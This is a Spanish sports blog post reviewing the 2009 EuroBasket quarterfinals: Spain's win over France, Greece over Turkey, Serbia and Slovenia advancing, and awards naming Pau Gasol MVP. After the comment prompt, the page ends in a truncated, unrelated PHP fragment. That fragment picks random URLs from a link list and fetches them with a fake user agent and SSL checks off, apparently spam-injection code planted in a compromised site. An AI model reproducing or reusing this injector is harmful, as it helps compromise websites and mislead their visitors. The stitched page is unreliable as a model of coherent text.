EuroNBAsket: Cuartos de final

19 de September de 2009 por txusma

Alguien comentaba que no le importaba si España quedaba segunda, tercera o cuarta de su grupo. Que le daba igual si se enfrentaba en cuartos a Rusia, Francia o Grecia. Que lo que de verdad era importante era el juego de la selección y su estado de forma. Interiormente todos sabíamos que esta selección española, vistas las ausencias del resto de equipos, era superior al resto de sus rivales. Tan solo el corto estado de forma de Pau Gasol (provocado por su lesión en la preparación), las malas actuaciones de algunos jugadores claves y decisiones más que dudosas de Sergio Scariolo habían hecho temblar los cimientos de la confianza que teníamos en este equipo.

Francia también sabía que, a pesar de las derrotas encajadas, España era el peor rival que les había podido caer en cuartos. Y por dentro les consumía la rabia pensando que el difícil enfrentamiento era producto de un campeonato inmaculado. Un premio a sus 5 victorias. Desgraciadamente para los franceses todos sus temores eran perfectamente fundados. Pau Gasol se erigió como líder demostrando una vez más que es, posiblemente, el mejor jugador europeo del momento. Tras su estela, un Rudy Fernández que anotó 3 triples de 4 intentos en el primer cuarto, ayudando a España a despegarse desde los primeros compases del encuentro y un Ricky Rubio que hizo la vida imposible a Tony Parker, ahogado entre los brazos de un base de 18 años y la teleraña defensiva de la selección. Por Francia tan solo la intensidad de Ronny Turiaf y los triples de Boris Diaw se salvaron de la quema. El resto de jugadores se vieron en todo momento superados mental y (sorpresa) físicamente.

España avanza a semifinales y peleará con Grecia por un puesto en la gran final. Los griegos, de la mano de un Spanoulis sublime, derrotaron a Turquía en la prórroga. Esta vez Ilyasova no apareció como venía siendo habitual y Turkoglu, a pesar de despertar en el último cuarto y casi dar la victoria a su equipo, tampoco completó un buen partido. Grecia cogió 19 rebotes más que Turquía y la apea de la competición.

En la otra semifinal se veran las caras dos conjuntos balcánicos. Serbia venció con relativa facilidad a Rusia de la mano de los jóvenes Uros Tripkovic y Kosta Perovic, actual jugador del Pamesa de Valencia y ex de los Golden State Warriors, mientras que Krstic sólo brilló en determinadas fases del partido. La juventud de los jugadores serbios nos hizo creer a todos que esta todavía no era su competición pero nos han demostrado que una vez superados los problemas de ego de sus mayores, Serbia vuelve a ser una auténtica potencia. Lo único que les separa de la final es Eslovenia que fue capaz de remontar 15 puntos de desventaja al final del segundo cuarto para acabar ganando de tan solo dos puntitos. De nuevo Erazem Lorbek, con 27 puntos y 8 rebotes, fue el jugador más destacado de su selcción. Nachbar anotó 12 puntos pero con malos porcentajes y Brezec casi ni jugó.

MVP: 28 puntos, 9 rebotes y 3 tapones tienen la culpa de que el premio sea claramente para Pau Gasol. Directo al MVP del campeonato.

Sorpresa: Haciendo un poco de trampa se lo otorgamos a Kosta Perovic. No juega en la NBA (y ya veremos si volverá) pero estuvo agitando la toalla con estilo en los GSW.

Decepción: El principal peligro de Francia venía de la mano de Tony Parker, pero al base ayer no le dejaron jugar en ningún momento. El resto de NBAs franceses tampoco estuvieron mucho mejor.

Mayor esfuerzo en vano: Podríamos hablar de la pareja IlyasovaTurkoglu aunque tampoco se lo curraron mucho.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>